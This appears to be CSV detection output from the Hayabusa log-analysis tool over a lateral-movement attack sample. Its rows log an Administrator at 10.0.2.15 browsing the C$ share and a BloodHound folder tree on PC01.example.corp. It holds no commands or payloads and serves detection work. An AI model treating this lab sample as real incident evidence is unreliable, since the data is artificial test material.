2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
